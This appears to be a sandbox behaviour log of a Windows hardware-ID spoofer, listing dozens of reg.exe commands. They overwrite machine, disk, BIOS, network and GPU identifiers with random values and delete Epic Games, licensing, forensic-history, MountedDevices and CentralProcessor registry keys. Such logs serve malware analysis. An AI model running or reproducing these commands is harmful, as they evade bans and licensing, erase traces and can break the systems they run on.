C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d Apple%random%-%random%-%random%-%random% /f3⤵PID:3088
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d Apple23055-5550-11734-16578 /f4⤵
- Modifies registry key
PID:4744
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d {Apple-%random%-%random} /f3⤵PID:4716
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d {Apple-23055-%random} /f4⤵
- Modifies registry key
PID:4824
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\HardwareConfig\Current /v BaseBoardProduct /t REG_SZ /d Apple-%random%%random%%random% /f3⤵PID:4812
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\HardwareConfig\Current /v BaseBoardProduct /t REG_SZ /d Apple-23055555011734 /f4⤵PID:3344
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLab /t REG_SZ /d Apple-%random% /f3⤵PID:1044
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLab /t REG_SZ /d Apple-23055 /f4⤵PID:4008
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d Apple-%random% /f3⤵PID:4136
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d Apple-23055 /f4⤵
- Modifies registry key
PID:2632
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DESCRIPTION\System\BIOS /v BaseBoardProduct /t REG_SZ /d Apple-%random%%random%%random% /f3⤵PID:2976
-
C:\Windows\system32\reg.exeREG ADD HKLM\HARDWARE\DESCRIPTION\System\BIOS /v BaseBoardProduct /t REG_SZ /d Apple-23055555011734 /f4⤵
- Enumerates system info in registry
- Modifies registry key
PID:2792
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {Apple-%random%-%random%-%random%%random%} /f3⤵PID:5256
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {Apple-23055-5550-1173416578} /f4⤵
- Modifies registry key
PID:3068
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {Apple-%random%-%random%-%random%%random%} /f3⤵PID:2436
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {Apple-23055-5550-1173416578} /f4⤵
- Modifies registry key
PID:384
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d {Apple-%random%-%random%-%random%%random%} /f3⤵PID:5040
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d {Apple-23055-5550-1173416578} /f4⤵PID:3596
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f3⤵PID:2168
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f3⤵PID:2060
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d Apple-23055-5550-1173416578 /f4⤵
- Modifies registry key
PID:4664
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLab /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f3⤵PID:3828
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLab /t REG_SZ /d Apple-23059-16299-295987873 /f4⤵PID:4756
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f3⤵PID:2272
-
C:\Windows\system32\reg.exeREG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d Apple-23059-16299-295987873 /f4⤵
- Modifies registry key
PID:1800
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f3⤵PID:4988
-
C:\Windows\system32\reg.exeREG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d Apple-23059-16299-295987873 /f4⤵
- Modifies registry key
PID:3372
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f3⤵PID:4604
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f3⤵PID:2204
-
C:\Windows\system32\reg.exeREG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d Apple-23059-16299-295987873 /f4⤵
- Enumerates system info in registry
- Modifies registry key
PID:2572
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {Apple-%random%-%random%-%random%%random%} /f3⤵PID:5768
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {Apple-23059-16299-295987873} /f4⤵
- Modifies registry key
PID:3696
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {Apple-%random%-%random%-%random%%random%} /f3⤵PID:3364
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {Apple-23059-16299-295987873} /f4⤵
- Modifies registry key
PID:5432
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d DESKTOP-%random% /f3⤵PID:3432
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d DESKTOP-23059 /f4⤵
- Modifies registry key
PID:5360
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d %random% /f3⤵PID:3524
-
C:\Windows\system32\reg.exeREG ADD HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d 23059 /f4⤵
- Modifies registry key
PID:5420
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d %random% /f3⤵PID:4724
-
C:\Windows\system32\reg.exeREG ADD HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d 23059 /f4⤵
- Modifies registry key
PID:6120
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d DESKTOP-%random% /f3⤵PID:1564
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d DESKTOP-23059 /f4⤵
- Modifies registry key
PID:2500
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {Apple%random%-%random%-%random%-%random%%random%} /f >nul 2>&13⤵PID:3800
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {Apple23059-16299-29598-787310449} /f4⤵
- Modifies registry key
PID:1560
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v GUID /t REG_SZ /d {Apple%random%-%random%-%random%-%random%%random%} /f3⤵PID:5292
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v GUID /t REG_SZ /d {Apple23059-16299-29598-787310449} /f4⤵
- Modifies registry key
PID:3440
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d %random% /f3⤵PID:5980
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d 23059 /f4⤵
- Modifies registry key
PID:4432
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOwner /t REG_SZ /d %random% /f3⤵PID:5956
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOwner /t REG_SZ /d 23059 /f4⤵PID:1972
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOrganization /t REG_SZ /d %random% /f3⤵PID:4276
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d %random%-%random%-%random%-%random% /f3⤵PID:6016
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d Apple%random%-%random%-%random%-%random% /f3⤵PID:4952
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_SZ /d Apple%random% /f3⤵PID:564
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_SZ /d Apple23059 /f4⤵
- Modifies registry key
PID:5612
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_SZ /d %random% /f3⤵PID:3076
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_SZ /d 23059 /f4⤵PID:1548
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLabEx /t REG_SZ /d %random% /f3⤵PID:4640
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLabEx /t REG_SZ /d 23059 /f4⤵
- Modifies registry key
PID:2064
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {Apple%random%-%random%-%random%-%random%} /f3⤵PID:2912
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {Apple23062-27047-14694-31936} /f4⤵
- Modifies registry key
PID:1512
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG delete HKCU\Software\Epic" "Games /f3⤵PID:1088
-
C:\Windows\system32\reg.exeREG delete HKCU\Software\Epic" "Games /f4⤵PID:5916
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG delete HKCU\Software\Epic Games /f3⤵PID:3296
-
C:\Windows\system32\reg.exeREG delete HKCU\Software\Epic Games /f4⤵PID:5880
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG delete HKCU\Software\Epic" "Games\Unreal" "Engine\Hardware" "Survey\HardwareSurveyFlags /f3⤵PID:64
-
C:\Windows\system32\reg.exeREG delete HKCU\Software\Epic" "Games\Unreal" "Engine\Hardware" "Survey\HardwareSurveyFlags /f4⤵PID:1016
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG delete HKCU\Software\Epic Games\Unreal Engine\Hardware Survey\HardwareSurveyFlags /f3⤵PID:1224
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d %random%-%random%-%random%-%random%%random% /f3⤵PID:1720
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d 23062-27047-14694-3193620763 /f4⤵
- Modifies registry key
PID:5896
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Classes\com.epicgames.launcher /f3⤵PID:416
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\WOW6432Node\EpicGames /f3⤵PID:896
-
C:\Windows\system32\reg.exereg delete HKLM\SOFTWARE\WOW6432Node\EpicGames /f4⤵
- Modifies registry key
PID:5940
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\WOW6432Node\Epic" "Games /f3⤵PID:5936
-
C:\Windows\system32\reg.exereg delete HKLM\SOFTWARE\WOW6432Node\Epic" "Games /f4⤵
- Modifies registry key
PID:5648
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKCR\com.epicgames.launcher /f3⤵PID:472
-
C:\Windows\system32\reg.exereg delete HKCR\com.epicgames.launcher /f4⤵PID:1652
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\MountedDevices /f3⤵PID:2468
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\MountedDevices /f4⤵PID:5836
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f3⤵PID:3260
-
C:\Windows\system32\reg.exereg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f4⤵PID:1456
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f3⤵PID:5512
-
C:\Windows\system32\reg.exereg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f4⤵PID:2240
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f3⤵PID:676
-
C:\Windows\system32\reg.exereg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f4⤵
- Modifies registry key
PID:640
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f3⤵PID:4004
-
C:\Windows\system32\reg.exereg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f4⤵
- Modifies registry key
PID:1640
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\LastEnum /f3⤵PID:3640
-
C:\Windows\system32\reg.exereg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\LastEnum /f4⤵PID:704
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f3⤵PID:5316
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d Apple-23065-5028-3255923232 /f4⤵
- Modifies registry key
PID:2576
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4584
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f3⤵PID:1400
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f3⤵PID:936
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f4⤵
- Modifies registry key
PID:6100
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f3⤵PID:5872
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d Apple-23065-5028-3255923232 /f4⤵
- Modifies registry key
PID:3848
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f3⤵PID:1380
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d Apple-23065-5028-3255923232 /f4⤵
- Modifies registry key
PID:2056
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f3⤵PID:780
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t REG_SZ /d Apple-23065-5028-3255923232 /f4⤵
- Modifies registry key
PID:5920
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\MountedDevices /f3⤵PID:680
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\MountedDevices /f4⤵PID:5308
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f3⤵PID:3576
-
C:\Windows\system32\reg.exereg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f4⤵
- Modifies registry key
PID:3884
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f3⤵PID:2828
-
C:\Windows\system32\reg.exereg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f4⤵
- Modifies registry key
PID:5988
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f3⤵PID:2192
-
C:\Windows\system32\reg.exereg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f4⤵
- Modifies registry key
PID:3804
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f3⤵PID:4192
-
C:\Windows\system32\reg.exereg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f4⤵
- Modifies registry key
PID:3888
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f3⤵PID:232
-
C:\Windows\system32\reg.exereg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f4⤵
- Modifies registry key
PID:4488
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKCU\Software\Classes\Interface /v ClsidStore /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f3⤵PID:220
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\Interface /v ClsidStore /t REG_BINARY /d 230655028325592323231078962429702342331316296021782623189 /f4⤵
- Modifies registry class
- Modifies registry key
PID:5264
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f3⤵PID:4056
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d Apple-23065-5028-3255923232 /f4⤵
- Modifies registry key
PID:4352
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f3⤵PID:2104
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d Apple-23065-5028-3255923232 /f4⤵
- Modifies registry key
PID:5160
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f3⤵PID:2848
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d Apple-23065-5028-3255923232 /f4⤵PID:216
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Classes\Interface /v ClsidStore /f3⤵PID:2876
-
C:\Windows\system32\reg.exereg delete HKCU\Software\Classes\Interface /v ClsidStore /f4⤵
- Modifies registry key
PID:4588
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v _DriverProviderInfo /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f3⤵PID:1988
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v _DriverProviderInfo /t REG_SZ /d Apple-23069-15776-1765514527 /f4⤵
- Modifies registry key
PID:4808
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f3⤵PID:4932
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d Apple-23069-15776-1765514527 /f4⤵
- Modifies registry key
PID:4992
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SettingsRequests /f3⤵PID:4960
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v BackupProductKeyDefault /f3⤵PID:4920
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v actionlist /f3⤵PID:4804
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f3⤵PID:4968
-
C:\Windows\system32\reg.exereg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f4⤵
- Modifies registry key
PID:3604
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist /f3⤵PID:4848
-
C:\Windows\system32\reg.exereg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist /f4⤵PID:4760
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Hex-Rays\IDA\History /f3⤵PID:4752
-
C:\Windows\system32\reg.exereg delete HKCU\Software\Hex-Rays\IDA\History /f4⤵
- Modifies registry key
PID:3608
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Hex-Rays\IDA\History64 /f3⤵PID:776
-
C:\Windows\system32\reg.exereg delete HKCU\Software\Hex-Rays\IDA\History64 /f4⤵
- Modifies registry key
PID:4120
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f3⤵PID:3456
-
C:\Windows\system32\reg.exereg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f4⤵
- Modifies registry key
PID:3688
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\System\CurrentControlSet\Control\TimeZoneInformation /f3⤵PID:5112
-
C:\Windows\system32\reg.exereg delete HKLM\System\CurrentControlSet\Control\TimeZoneInformation /f4⤵PID:2544
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f3⤵PID:4832
-
C:\Windows\system32\reg.exereg delete HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f4⤵
